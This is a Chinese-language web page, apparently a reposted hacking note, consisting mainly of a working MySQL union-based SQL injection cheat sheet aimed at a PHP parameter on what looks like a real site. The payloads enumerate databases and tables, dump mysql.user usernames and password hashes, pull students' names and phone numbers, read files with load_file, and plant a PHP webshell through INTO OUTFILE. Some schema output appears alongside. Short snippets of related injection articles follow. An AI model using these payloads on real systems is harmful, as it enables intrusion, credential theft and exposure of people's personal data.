php注入

1.判断是否存在注入,加‘;and 1=1;and 1=2
2.判断版本 and ord(mid(version(),1,1))>51 代替。
5.判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0 select1,concat(char(124,13,10),SCHEMA_NAME,char(124,13,10)),3,4,5,6,7,8,9,10,11,12,13,14,15 frominformation_schema.SCHEMA limit 0,1/*

先用union select 0,1,TABLE_NAME,3,4 FROM INFORMATION_SCHEMA.TABLES limit 0,1/*把所有的表暴出来
再用union select 0,1,COLUMN_NAME,3,4 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=要查询的表名17,1/*
屡试不爽
http://localhost/inject.php?id=1 and 1=2 union select concat(char(124,13,10),SCHEMA_NAME,char(124,13,10)),2,3,4,5,6,7,8 FROM INFORMATION_SCHEMA.TABLES where information_schema.SCHEMATA.SCHEMA_NAME=0x276773726327 limit 2,1

union select concat(char(124,13,10),TABLE_NAME,char(124,13,10)),2,3,4,5,6,7,8 FROM information_schema.SCHEMATA where information_schema.SCHEMATA.SCHEMA_NAME=0x276773726327

union select 1,2,load_file(‘c:\123.txt‘),4,5,6,into outfile‘123.php‘

/*相关信息查询
/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),@@basedir,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 /* and 1=1

current_user() session_user() system_user() @@datadir @@tmpdir @@version_compile_os

job_detail.php?InfoId=347 and 1=2 union select 1,2,3,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),5,6,7,8 from (select * from (select * from mysql.user order by user limit 0,1) t order by user desc)t limit 1/* and 1=1
暴数据库用户名和密码
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 0,1) t order by user desc)t limit 1/* and 1=1

ob_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),password,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 0,1) t order by user desc)t limit 1/* and 1=1

job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 1,1) t order by user desc)t limit 1/* and 1=1

and 1=2 union select 1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 4,1) t order by user desc)t limit 1/* and 1=1

/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),count(*),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from information_schema.tables group by table_schema order by table_schema)t limit 1/* and 1=1

| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE | ENGINE | VERSION | RO
W_FORMAT | TABLE_ROWS | AVG_ROW_LENGTH | DATA_LENGTH | MAX_DATA_LENGTH | INDEX_L
ENGTH | DATA_FREE | AUTO_INCREMENT | CREATE_TIME         | UPDATE_TIME         |
CHECK_TIME | TABLE_COLLATION | CHECKSUM | CREATE_OPTIONS | TABLE_COMMENT |
+---------------+--------------+------------+------------+--------+---------+---
---------+------------+----------------+-------------+-----------------+--------
------+-----------+----------------+---------------------+---------------------+
------------+-----------------+----------+----------------+---------------+
| NULL          | chinapiao    | air_city   | BASE TABLE | MyISAM |      10 | Dy
namic    |        884 |             39 |       34740 | 281474976710655 |
11264 |         0 |           1982 | 2009-04-09 21:22:59 | 2009-04-09 21:40:25 |
NULL       | utf8_general_ci |     NULL |                |               |
爆出所有库名
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 0,1) t order by table_schema desc)t limit 1/* and 1=1
^^^information_schema^^^
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 1,1) t order by table_schema desc)t limit 1/* and 1=1
^^^league^^^
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 2,1) t order by table_schema desc)t limit 1/* and 1=1
^^^mysql^^^

用selelct查询语句查询数据库
inject.php?id=1 and (select ascii(substr(table_schema,8,1)) from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 3,1) t order by table_schema desc)t limit 1)>120 and 1=1
inject.php?id=1 and (select ascii(substr(table_schema,8,1)) from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 3,1) t order by table_schema desc)t limit 1)>116 and 1=1

/*暴表
跨库查询暴表
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.tables where table_schema=0x6c6561677565 limit 1/* and 1=1
跨库查询暴列
/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.columns where table_name=0x6962665f656d61696c5f6c6f6773 and table_schema=0x6c6561677565 limit 1/* and 1=1

job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.tables where table_schema=0x73697365 limit 1/* and 1=1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 0,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 1,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 2,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 3,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1

/*暴列

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 order by 1 limit 1,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 order by 1 limit 2,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

/*猜解列值

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from matriculater2005 where 1=1 limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),numberid,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),phone,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),linkman,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),specialityid,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),speciality,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

/*写入php一句话木马
<?require($_REQUEST[‘evil_file_path‘]);echo "zwell has been here"?>

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(60),char(63),char(114),char(101),char(113),char(117),char(105),char(114),char(101),char(40),char(36),char(95),char(82),char(69),char(81),char(85),char(69),char(83),char(84),char(91),char(39),char(101),char(118),char(105),char(108),char(95),char(102),char(105),char(108),char(101),char(95),char(112),char(97),char(116),char(104),char(39),char(93),char(41),char(59),char(101),char(99),char(104),char(111),char(32),char(34),char(122),char(119),char(101),char(108),char(108),char(32),char(104),char(97),char(115),char(32),char(98),char(101),char(101),char(110),char(32),char(104),char(101),char(114),char(101),char(34),char(63),char(62),char(13),char(10)),1,1,1,1,1,1,1,1,1,1,1 into outfile ‘/etc/zwell.php‘/* and 1=1 HTTP/1.1

php注入

时间: 2024-10-24 01:19:16

php注入的相关文章

WAF——针对Web应用发起的攻击,包括但不限于以下攻击类型:SQL注入、XSS跨站、Webshell上传、命令注入、非法HTTP协议请求、非授权文件访问等

核心概念 WAF Web应用防火墙(Web Application Firewall),简称WAF. Web攻击 针对Web应用发起的攻击,包括但不限于以下攻击类型:SQL注入.XSS跨站.Webshell上传.命令注入.非法HTTP协议请求.非授权文件访问等.

别人的渗透测试(三)--SQL显错注入

续上一章. 安全狗拦下7成的人,过狗是门学问,偷笑.jpg.很感谢和https://home.cnblogs.com/u/xishaonian/ 博主能一起研究过狗. 说多了,言归正传SQL注入大显错.只适用MYSQL,其它数据库没学呢... 1.count,rand,floor 2.updatexml()[最大长度限制32位] 3.extractvalue()[最大长度限制32位] 4.geometrycollection() 5.multipoint() 6.polygon() 7.mult

Angularjs[补21] - 显示注入,隐示注入

<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title></title> </head> <body> <div ng-app="myApp"> <div ng-controller="secondController"> &

报错注入分析之updatexml注入

PS:今天元旦,家里打来电话说,今年春节要回老家.心里倍感恐惧.可以清楚的感觉得到父母说话的气息没有底气.大概如同我一样是恐惧吧.加油吧!努力赚钱! 回归正题:updatexml注入 首先了解一下什么是updatexml函数. 前言:相比基于查询的SQL注入,使用insert.update和delete进行SQL注入显得略显另类 参考自:http://www.exploit-db.com/wp-content/themes/exploit/docs/33253.pdf 0x1 准备条件 a. m

sql注入初中高学习

以下三篇文件关于SQL注入写的很通俗易懂,整理收藏下 渗透攻防Web篇-SQL注入攻击初级: http://bbs.ichunqiu.com/thread-9518-1-1.html 渗透攻防Web篇-SQL注入攻击中级: http://bbs.ichunqiu.com/thread-9668-1-1.html 渗透攻防Web篇-SQL注入攻击高级: http://bbs.ichunqiu.com/thread-10093-1-1.html

Spring quartz定时任务service注入问题

今天想单元测试一下spring中的quartz定时任务,一顿折腾,到最后总是发现job类里注入的service为null.一开始还以为spring的配置问题,各种找原因,最后还是确定是没有注入. 就去网上搜搜吧.也找出来一些眉目.简单的理解这个原因是job是在quartz中实例化出来的,不受spring的管理.所以就导致注入不进去了.参考这个文章 http://www.tuicool.com/articles/Qjyamu 找着试试的态度,就按照文章里说的.new一个类 public class

php中防止SQL注入的方法

[一.在服务器端配置] 安全,PHP代码编写是一方面,PHP的配置更是非常关键. 我们php手手工安装的,php的默认配置文件在 /usr/local/apache2/conf/php.ini,我们最主要就是要配置php.ini中的内容,让我们执行 php能够更安全.整个PHP中的安全设置主要是为了防止phpshell和SQL Injection的攻击,一下我们慢慢探讨.我们先使用任何编辑工具打开 /etc/local/apache2/conf/php.ini,如果你是采用其他方式安装,配置文件

简单实用的PHP防注入类实例

这篇文章主要介绍了简单实用的PHP防注入类实例,以两个简单的防注入类为例介绍了PHP防注入的原理与技巧,对网站安全建设来说非常具有实用价值,需要的朋友可以参考下 本文实例讲述了简单实用的PHP防注入类.分享给大家供大家参考.具体如下: PHP防注入注意要过滤的信息基本是get,post,然后对于sql就是我们常用的查询,插入等等sql命令了,下面我给各位整理两个简单的例子,希望这些例子能给你网站带来安全. PHP防注入类代码如下: 复制代码 代码如下: <?php /**  * 参数处理类  *

iOS控制反转(IoC)与依赖注入(DI)的实现

背景 最近接触了一段时间的SpringMVC,对其控制反转(IoC)和依赖注入(DI)印象深刻,此后便一直在思考如何使用OC语言较好的实现这两个功能.Java语言自带的注解特性为IoC和DI带来了极大的方便,要在OC上较好的实现这两个功能,需要一些小小的技巧. 控制反转和依赖注入 控制反转 简单来说,将一个类对象的创建由手动new方式改为从IOC容器内获取,就是一种控制反转,例如我们现在要创建一个ClassA类,则常规方法为 ClassA *a = [ClassA new]; 如果使用控制反转,

sql注入总结

本实验测试是基于sqli-labs的实验环境 环境配置:php+mysql 环境搭建请参考 http://www.freebuf.com/articles/web/34619.html Sql注入定义: 就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行的sql命令的目的 sql注入分类: 基于联合查询 基于错误回显 基于盲注,分时间盲注和布尔型的盲注 基于user-agent 基于feferer 基于cookie 二次注入 宽字节注入 注入一个网站